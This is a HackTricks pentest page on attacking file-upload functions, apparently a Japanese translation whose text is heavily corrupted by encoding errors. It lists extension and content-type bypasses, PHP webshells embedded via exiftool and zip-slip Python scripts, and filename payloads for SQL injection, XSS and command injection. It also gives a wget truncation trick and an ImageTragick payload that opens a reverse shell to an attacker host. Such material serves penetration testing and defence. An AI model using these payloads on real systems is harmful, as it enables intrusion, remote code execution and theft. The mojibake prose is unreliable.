21 KiB
âïž HackTricks Cloud âïž -ðŠ Twitter ðŠ - ðïž Twitch ðïž - ð¥ Youtube ð¥
-
ãµã€ããŒã»ãã¥ãªãã£äŒæ¥ã§åããŠããŸããïŒ HackTricksã§äŒç€Ÿã宣äŒãããã§ããïŒãŸãã¯ãPEASSã®ææ°ããŒãžã§ã³ãå ¥æããããHackTricksãPDFã§ããŠã³ããŒããããã§ããïŒSUBSCRIPTION PLANSããã§ãã¯ããŠãã ããïŒ
-
The PEASS FamilyãèŠã€ããŠãã ãããç¬å çãªNFTã®ã³ã¬ã¯ã·ã§ã³ã§ãã
-
å ¬åŒã®PEASSïŒHackTricksã®ã°ããºãæã«å ¥ããŸãããã
-
ð¬ Discordã°ã«ãŒããŸãã¯telegramã°ã«ãŒãã«åå ããããTwitterã§ðŠ@carlospolopmããã©ããŒããŠãã ããã
-
ãããã³ã°ã®ããªãã¯ãå ±æããã«ã¯ãhacktricksãªããžããªãšhacktricks-cloudãªããžããªã«PRãæåºããŠãã ããã
ãã¡ã€ã«ã®ã¢ããããŒãäžè¬çãªææ³
- ããã«æ¡åŒµåãæã€ãã¡ã€ã«ãã¢ããããŒãããŠã¿ãŠãã ããïŒäŸïŒfile.png.php_ãŸãã¯_file.png.php5ïŒã
- PHPã®æ¡åŒµåïŒ.php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtml, .pgif, .shtml, .htaccess, .phar, .inc
- ASPã®æ¡åŒµåïŒ.asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .asp, .cer, .shtml
- æ¡åŒµåã®äžéšã倧æåã«ããŠã¿ãŠãã ãããäŸïŒ.pHp, .pHP5, .PhAr ...
- ããã«ïŒãŸãã¯ãã以äžã®ïŒæ¡åŒµåãã¢ããããŒãããŠã¿ãŠãã ããïŒç¹å®ã®æ¡åŒµåãååšãããã©ããããã¹ããããã¹æ§æã®ãã§ãã¯ããã€ãã¹ããã®ã«åœ¹ç«ã¡ãŸãïŒïŒ
- file.png.php
- file.png.txt.php
- éããã«æ¡åŒµåãã¢ããããŒãããŠã¿ãŠãã ããïŒApacheã®ãã¹æ§æãæªçšããã®ã«åœ¹ç«ã¡ãŸããæ¡åŒµå_.php_ã§ããå¿ èŠã¯ãããŸããããã³ãŒããå®è¡ãããŸãïŒïŒ
- äŸïŒfile.php.png
- ãã«æåã䜿çšããããã«æ¡åŒµåïŒ
- äŸïŒfile.php%00.png
- æ¡åŒµåã®æ«å°Ÿã«ç¹æ®æåãè¿œå ããŠãã ããïŒïŒ 00, ïŒ 20, ïŒããã€ãã®ãããïŒ....
- file.php%00
- file.php%20
- file.php...... --> Windowsã§ã¯ããã¡ã€ã«ãæ«å°Ÿã«ãããã§äœæããããšããããã¯åé€ãããŸãïŒ.phpãšããŠã®æ¡åŒµåããã§ãã¯ãããã£ã«ã¿ããã€ãã¹ã§ããŸãïŒ
- file.php/
- _file.php._
- Content-Typeãããã®å€ãèšå®ããããšã§ãContent-Typeã®ãã§ãã¯ããã€ãã¹ããŠãã ããïŒimage/pngãtext/plainãapplication/octet-stream
- ããžãã¯ãã³ããŒãã§ãã¯ããã€ãã¹ããããã«ããã¡ã€ã«ã®å
é ã«å®éã®ç»åã®ãã€ããè¿œå ããŠãã ããïŒ_file_ã³ãã³ããæ··ä¹±ãããŸãïŒããŸãã¯ãã·ã§ã«ãã¡ã¿ããŒã¿ã«æ¿å
¥ããŸãïŒ
exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
- ãã¡ã€ã«å ã®ã©ãã«ã§ãããããèšå®ã§ãããããããžãã¯ãã€ãããã¡ã€ã«ã§ãã§ãã¯ãããŠããå¯èœæ§ããããŸãã
- Windowsã®NTFS代æ¿ããŒã¿ã¹ããªãŒã ïŒADSïŒã䜿çšããŸãããã®å ŽåãçŠæ¢ãããæ¡åŒµåã®åŸãã«ã³ãã³æåã:ããæ¿å ¥ãããŸãããã®çµæããµãŒããŒäžã«çŠæ¢ãããæ¡åŒµåã®ç©ºã®ãã¡ã€ã«ãäœæãããŸãïŒäŸïŒãfile.asax:.jpgãïŒããã®ãã¡ã€ã«ã¯ããã®åŸä»ã®ãã¯ããã¯ã䜿çšããŠç·šéããããšãã§ããŸããããšãã°ããã®çããã¡ã€ã«åã䜿çšããããšã§ãããŸããã::$dataããã¿ãŒã³ã䜿çšããŠç©ºã§ãªããã¡ã€ã«ãäœæããããšãã§ããŸãããããã£ãŠããã®ãã¿ãŒã³ã®åŸã«ãããæåãè¿œå ããããšãããããªãå¶éããã€ãã¹ããã®ã«åœ¹ç«ã€å ŽåããããŸãïŒäŸïŒãfile.asp::$data.ãïŒã
- èš±å¯ãããæ¡åŒµåïŒpngïŒã§ããã¯ãã¢ãã¢ããããŒãããããã¯ãã¢ãå®è¡ããããã¹æ§æãç¥ããŸãã
- æ¢ã«ã¢ããããŒãããããã¡ã€ã«ããªããŒã ããè匱æ§ãèŠã€ããŸãïŒæ¡åŒµåãå€æŽããããïŒã
- ããŒã«ã«ãã¡ã€ã«ã€ã³ã¯ã«ãŒãžã§ã³ã®è匱æ§ãèŠã€ããŠããã¯ãã¢ãå®è¡ããŸãã
- å¯èœãªæ å ±æŒæŽ©ïŒ
- åãååã®åããã¡ã€ã«ãè€æ°åïŒåæã«ïŒã¢ããããŒãããŸãã
- æ¢ã«ååšãããã¡ã€ã«ãŸãã¯ãã©ã«ãã®ååãæã€ãã¡ã€ã«ãã¢ããããŒãããŸãã
- **â.âãâ..âãââŠâ**ãååãšãããã¡ã€ã«ãã¢ããããŒãããŸããããšãã°ãWindowsã®Apacheã§ã¯ãã¢ããªã±ãŒã·ã§ã³ãã¢ããããŒãããããã¡ã€ã«ãã/www/uploads/ããã£ã¬ã¯ããªã«ä¿åããå Žåãã.ãã®ãã¡ã€ã«åã¯ã/www/ããã£ã¬ã¯ããªã«ãuploadsããšããååã®ãã¡ã€ã«ãäœæããŸãã
- NTFSã§åé€ã容æã§ãªããã¡ã€ã«ãã¢ããããŒãããŸããäŸïŒãâŠ:.jpgãïŒWindowsïŒ
- ååã«
|<>*?â
ãªã©ã®ç¡å¹ãªæåãå«ãWindowsã§ã®ãã¡ã€ã«ã®ã¢ããããŒãïŒWindowsïŒ - CONãPRNãAUXãNULãCOM1ãCOM2ãCOM3ãCOM4ãCOM5ãCOM6ãCOM7ãCOM8ãCOM9ãLPT1ãLPT2ãLPT3ãLPT4ãLPT5ãLPT6ãLPT7ãLPT8ãLPT9ãªã©ã®äºçŽæžã¿ïŒçŠæ¢ïŒåã䜿çšããŠWindowsã«ãã¡ã€ã«ãã¢ããããŒãããŸãã
ãŸãã誀ã£ãŠ
.phar
ãã¡ã€ã«ã¯ãJavaã®.jar
ã«äŒŒãŠããŸãããPHPçšã§ãããPHPãã¡ã€ã«ã®ããã«äœ¿çšã§ããŸãïŒPHPã§å®è¡ããããã¹ã¯ãªããå
ã«å«ãããªã©ïŒã
.inc
æ¡åŒµåã¯ããã¡ã€ã«ã®ã€ã³ããŒãã«ã®ã¿äœ¿çšãããããšããããŸãã®ã§ãããæç¹ã§ã誰ãããã®æ¡åŒµåãå®è¡ã§ããããã«èš±å¯ããŠããå¯èœæ§ããããŸãã
BurpSuitãã©ã°ã€ã³ã䜿çšããŠãå€ãã®å¯èœãªãã¡ã€ã«ã¢ããããŒãã®è匱æ§ããã§ãã¯ããŠãã ããïŒhttps://github.com/modzero/mod0BurpUploadScanner ãŸãã¯ãã¢ããããŒãå¯èœãªãã¡ã€ã«ãèŠã€ããã³ãŒããå®è¡ããããã®ããŸããŸãªããªãã¯ãè©Šãã³ã³ãœãŒã«ã¢ããªã±ãŒã·ã§ã³ã䜿çšããŠãã ããïŒhttps://github.com/almandin/fuxploider
wgetãã¡ã€ã«ã¢ããããŒã/SSRFããªãã¯
å Žåã«ãã£ãŠã¯ããµãŒããŒã**wget
ã䜿çšããŠãã¡ã€ã«ãããŠã³ããŒãããŠãããURLãæå®ã§ããããšããããŸãããããã®å Žåãã³ãŒãã¯ããŠã³ããŒãããããã¡ã€ã«ã®æ¡åŒµåããã¯ã€ããªã¹ãå
ã«ããããšã確èªããŠãèš±å¯ããããã¡ã€ã«ã®ã¿ãããŠã³ããŒããããããã«ããŸãããã ãããã®ãã§ãã¯ã¯ãã€ãã¹ã§ããŸãã
Linuxã§ã®ãã¡ã€ã«åã®æ倧é·ãã¯255ã§ãããwgetã¯ãã¡ã€ã«åã236æåã«åãè©°ããŸãã"A"*232+".php"+".gif"ãšããååã®ãã¡ã€ã«ãããŠã³ããŒãã§ããŸãããã®ãã¡ã€ã«åã¯ããã®äŸã§ã¯".gif"ãæå¹ãªæ¡åŒµåã§ããããããã§ãã¯ããã€ãã¹ããŸãããwget
ã¯ãã¡ã€ã«ã"A"*232+".php"ã«ãªããŒã **ããŸãã
#Create file and HTTP server
echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
python3 -m http.server 9080
#Download the file
wget 127.0.0.1:9080/$(python -c 'print("A"*(236-4)+".php"+".gif")')
The name is too long, 240 chars total.
Trying to shorten...
New name is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.
--2020-06-13 03:14:06-- http://127.0.0.1:9080/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
Connecting to 127.0.0.1:9080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10 [image/gif]
Saving to: âAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.phpâ
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[===============================================>] 10 --.-KB/s in 0s
2020-06-13 03:14:06 (1.96 MB/s) - âAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.phpâ saved [10/10]
泚æããŠãã ããããã®ãã§ãã¯ããã€ãã¹ããããã«èããŠããå¥ã®ãªãã·ã§ã³ã¯ãHTTPãµãŒããŒãå¥ã®ãã¡ã€ã«ã«ãªãã€ã¬ã¯ããããããšã§ãããã®ãããåæã®URLã¯ãã§ãã¯ããã€ãã¹ããŸãããwgetã¯æ°ããååã§ãªãã€ã¬ã¯ãããããã¡ã€ã«ãããŠã³ããŒãããŸããããã¯ãwgetããã©ã¡ãŒã¿--trust-server-names
ãšäžç·ã«äœ¿çšãããŠããå Žåãé€ããŠã¯æ©èœããŸããããªããªããwgetã¯ãªãã€ã¬ã¯ããããããŒãžãå
ã®URLã§æå®ããããã¡ã€ã«åã§ããŠã³ããŒãããããã§ãã
ãã¡ã€ã«ã¢ããããŒãããä»ã®è匱æ§ãž
- ãã¡ã€ã«åã
../../../tmp/lol.png
ã«èšå®ãããã¹ãã©ããŒãµã«ãè©Šã¿ã - ãã¡ã€ã«åã
sleep(10)-- -.jpg
ã«èšå®ããSQLã€ã³ãžã§ã¯ã·ã§ã³ãéæããããšãã§ãããããããŸãã - ãã¡ã€ã«åã
<svg onload=alert(document.comain)>
ã«èšå®ããŠãXSSãéæãã - ãã¡ã€ã«åã
; sleep 10;
ã«èšå®ããŠãããã€ãã®ã³ãã³ãã€ã³ãžã§ã¯ã·ã§ã³ããã¹ãããïŒè©³çŽ°ã¯ãã¡ãïŒ - ç»åïŒsvgïŒãã¡ã€ã«ã®ã¢ããããŒãã«ãããXSS
- JSãã¡ã€ã«ã®ã¢ããããŒã+XSS = Service Workersã®æªçš
- svgã¢ããããŒãã«ãããXXE
- svgãã¡ã€ã«ã®ã¢ããããŒãã«ãããªãŒãã³ãªãã€ã¬ã¯ã
- æåãªImageTrickè匱æ§
- ãŠã§ããµãŒããŒã«ç»åãååŸãããããšãã§ããå ŽåãSSRFãæªçšããããšãã§ããŸãããã®ç»åãããã€ãã®å ¬éãµã€ãã«ä¿åãããå Žåãhttps://iplogger.org/invisible/ããã®URLãæå®ããŠããã¹ãŠã®èšªåè ã®æ å ±ãçãããšãã§ããŸãã
以äžã¯ãã¢ããããŒãã«ãã£ãŠéæã§ããããã10ã®ããšã§ãïŒãªã³ã¯ããïŒïŒ
- ASP / ASPX / PHP5 / PHP / PHP3ïŒWebã·ã§ã« / RCE
- SVGïŒæ ŒçŽåXSS / SSRF / XXE
- GIFïŒæ ŒçŽåXSS / SSRF
- CSVïŒCSVã€ã³ãžã§ã¯ã·ã§ã³
- XMLïŒXXE
- AVIïŒLFI / SSRF
- HTML / JSïŒHTMLã€ã³ãžã§ã¯ã·ã§ã³ / XSS / ãªãŒãã³ãªãã€ã¬ã¯ã
- PNG / JPEGïŒãã¯ã»ã«ãã©ããæ»æïŒDoSïŒ
- ZIPïŒLFIçµç±ã®RCE / DoS
- PDF / PPTXïŒSSRF / BLIND XXE
ZIPãã¡ã€ã«ã®èªå解åã¢ããããŒã
ãµãŒããŒå ã§è§£åãããZIPãã¢ããããŒãã§ããå Žåã2ã€ã®ããšãã§ããŸãïŒ
ã·ã³ããªãã¯ãªã³ã¯
ä»ã®ãã¡ã€ã«ãžã®ã·ã³ããªãã¯ãªã³ã¯ãå«ããªã³ã¯ãã¢ããããŒããã解åããããã¡ã€ã«ã«ã¢ã¯ã»ã¹ããããšã§ããªã³ã¯ããããã¡ã€ã«ã«ã¢ã¯ã»ã¹ã§ããŸãïŒ
ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
ç°ãªããã©ã«ãã§è§£åãã
解åããããã¡ã€ã«ã¯äºæããªããã©ã«ãã«äœæãããŸãã
OSã¬ãã«ã®ã³ãã³ãå®è¡ããæªæã®ãããã¡ã€ã«ã®ã¢ããããŒããä¿è·ããããã«ããã®èšå®ãæå¹ã§ãããšç°¡åã«æ³åããããšãã§ããŸãããæ®å¿µãªããããã¯çå®ã§ã¯ãããŸãããZIPã¢ãŒã«ã€ã圢åŒã¯éå±€çãªå§çž®ããµããŒãããŠãããããã«äžäœã®ãã£ã¬ã¯ããªãåç §ããããšãã§ããããã察象ã¢ããªã±ãŒã·ã§ã³ã®è§£åæ©èœãæªçšããããšã§å®å šãªã¢ããããŒããã£ã¬ã¯ããªããè±åºããããšãã§ããŸãã
ãã®çš®ã®ãã¡ã€ã«ãäœæããããã®èªååããããšã¯ã¹ããã€ãã¯ããã¡ãã§èŠã€ããããšãã§ããŸã: https://github.com/ptoomey3/evilarc
python evilarc.py -o unix -d 5 -p /var/www/html/ rev.php
以äžã¯ãæªæã®ããzipãã¡ã€ã«ãäœæããããã®Pythonã³ãŒãã§ãã
import zipfile
# Create a new zip file
zip_file = zipfile.ZipFile('malicious.zip', 'w')
# Add a file to the zip
zip_file.write('payload.txt')
# Add a malicious file to the zip
zip_file.writestr('../path/to/evil.txt', 'This file is malicious!')
# Close the zip file
zip_file.close()
ãã®Pythonã³ãŒãã¯ãmalicious.zip
ãšããååã®æ°ããzipãã¡ã€ã«ãäœæããpayload.txt
ãšãããã¡ã€ã«ãè¿œå ããŸããããã«ã../path/to/evil.txt
ãšããæªæã®ãããã¡ã€ã«ãzipã«è¿œå ããŸããæåŸã«ãzipãã¡ã€ã«ãéããŸãã
#!/usr/bin/python
import zipfile
from cStringIO import StringIO
def create_zip():
f = StringIO()
z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
z.writestr('../../../../../var/www/html/webserver/shell.php', '<?php echo system($_REQUEST["cmd"]); ?>')
z.writestr('otherfile.xml', 'Content of the file')
z.close()
zip = open('poc.zip','wb')
zip.write(f.getvalue())
zip.close()
create_zip()
ãªã¢ãŒãã³ãã³ãå®è¡ãéæããããã«ã以äžã®æé ãå®è¡ããŸããïŒ
- PHPã·ã§ã«ãäœæããŸãïŒ
<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST['cmd']);
system($cmd);
}?>
- ããã¡ã€ã«ã¹ãã¬ãŒããšåŒã°ããææ³ã䜿çšããå§çž®ãããzipãã¡ã€ã«ãäœæããŸã:
root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# ls *.php
simple-backdoor.php xxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php
xxAcmd.php xxAxxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php
xxAxxAcmd.php xxAxxAxxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAxxAxxAcmd.php
root@s2crew:/tmp# zip cmd.zip xx*.php
adding: xxAcmd.php (deflated 40%)
adding: xxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
root@s2crew:/tmp#
- ããã¯ã¹ãšãã£ã¿ãŸãã¯viã䜿çšããŠããxxAããã../ãã«å€æŽããŸããç§ã¯viã䜿çšããŸããïŒ
:set modifiable
:%s/xxA/..\//g
:x!
å®äºïŒ
ããšäžã€ã®ã¹ããããæ®ã£ãŠããŸãïŒZIPãã¡ã€ã«ãã¢ããããŒãããã¢ããªã±ãŒã·ã§ã³ã«è§£åãããŸãïŒæåããã°ããŠã§ããµãŒããŒã«ååãªæš©éãããã°ãã·ã¹ãã äžã«ç°¡åãªOSã³ãã³ãå®è¡ã·ã§ã«ãååšããŸãïŒ
åè: https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/
ImageTragic
ãã®ã³ã³ãã³ããç»åæ¡åŒµåã§ã¢ããããŒãããŠãèåŒ±æ§ (ImageMagick , 7.0.1-1) ãæªçšããŸã
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context
PGNã«PHPã·ã§ã«ãåã蟌ã
IDATãã£ã³ã¯ã«ãŠã§ãã·ã§ã«ãé 眮ããäž»ãªçç±ã¯ããªãµã€ãºããã³åãµã³ããªã³ã°æäœããã€ãã¹ã§ããããã§ããPHP-GDã«ã¯ããããè¡ãããã®2ã€ã®é¢æ°ãimagecopyresizedããã³imagecopyresampledãå«ãŸããŠããŸãã
ãã®æçš¿ãèªãã§ãã ããïŒhttps://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
ããªã°ããããã¡ã€ã«
ã»ãã¥ãªãã£ã®æèã§ã®ããªã°ããããšã¯ãè€æ°ã®ç°ãªããã¡ã€ã«ã¿ã€ãã®æå¹ãªåœ¢åŒã§ãããã¡ã€ã«ã®ããšãæããŸããäŸãã°ãGIFARã¯GIFãã¡ã€ã«ãšRARãã¡ã€ã«ã®äž¡æ¹ã§ãããŸããGIFãšJSã®äž¡æ¹ãPPTãšJSã®äž¡æ¹ãªã©ãè€æ°ã®ãã¡ã€ã«ã¿ã€ãã§ãããã¡ã€ã«ãååšããŸãã
ããªã°ããããã¡ã€ã«ã¯ããã¡ã€ã«ã¿ã€ãã«åºã¥ãä¿è·ããã€ãã¹ããããã«ãã䜿çšãããŸãããŠãŒã¶ãŒãå±éºãªãã¡ã€ã«ïŒJSãã¡ã€ã«ãPHPãã¡ã€ã«ãPharãã¡ã€ã«ãªã©ïŒãã¢ããããŒãããããšãé²ãããã«ãå€ãã®ã¢ããªã±ãŒã·ã§ã³ã¯ç¹å®ã®ã¿ã€ãïŒJPEGãGIFãDOCãªã©ïŒã®ã¿ã®ã¢ããããŒããèš±å¯ããŸãã
ããã«ãããè€æ°ã®ç°ãªã圢åŒã®ãã©ãŒãããã«æºæ ãããã¡ã€ã«ãã¢ããããŒãã§ããŸããJPEGã®ããã«èŠããããå®éã«ã¯PHARãã¡ã€ã«ïŒPHp ARchiveïŒã§ãããã¡ã€ã«ãã¢ããããŒãããããšãã§ããŸãããæå¹ãªæ¡åŒµåãå¿ èŠã§ãããã¢ããããŒãæ©èœãèš±å¯ããªãå Žåã¯åœ¹ã«ç«ã¡ãŸããã
詳现ã¯ãã¡ãïŒhttps://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a
âïž HackTricks Cloud âïž -ðŠ Twitter ðŠ - ðïž Twitch ðïž - ð¥ Youtube ð¥
-
ãµã€ããŒã»ãã¥ãªãã£äŒæ¥ã§åããŠããŸããïŒ HackTricksã§ããªãã®äŒç€Ÿã宣äŒãããã§ããïŒãŸãã¯ãææ°ããŒãžã§ã³ã®PEASSãå ¥æããããHackTricksãPDFã§ããŠã³ããŒããããã§ããïŒSUBSCRIPTION PLANSããã§ãã¯ããŠãã ããïŒ
-
The PEASS FamilyãçºèŠããŸããããç¬å çãªNFTã®ã³ã¬ã¯ã·ã§ã³ã§ãã
-
å ¬åŒã®PEASSïŒHackTricksã®ã°ããºãæã«å ¥ããŸãããã
-
ð¬ Discordã°ã«ãŒããŸãã¯ãã¬ã°ã©ã ã°ã«ãŒãã«åå ããããTwitter ðŠ@carlospolopmããã©ããŒããŠãã ããã
-
ãããã³ã°ã®ããªãã¯ãå ±æããã«ã¯ãhacktricksãªããžããªãšhacktricks-cloudãªããžããªã«PRãæåºããŠãã ããã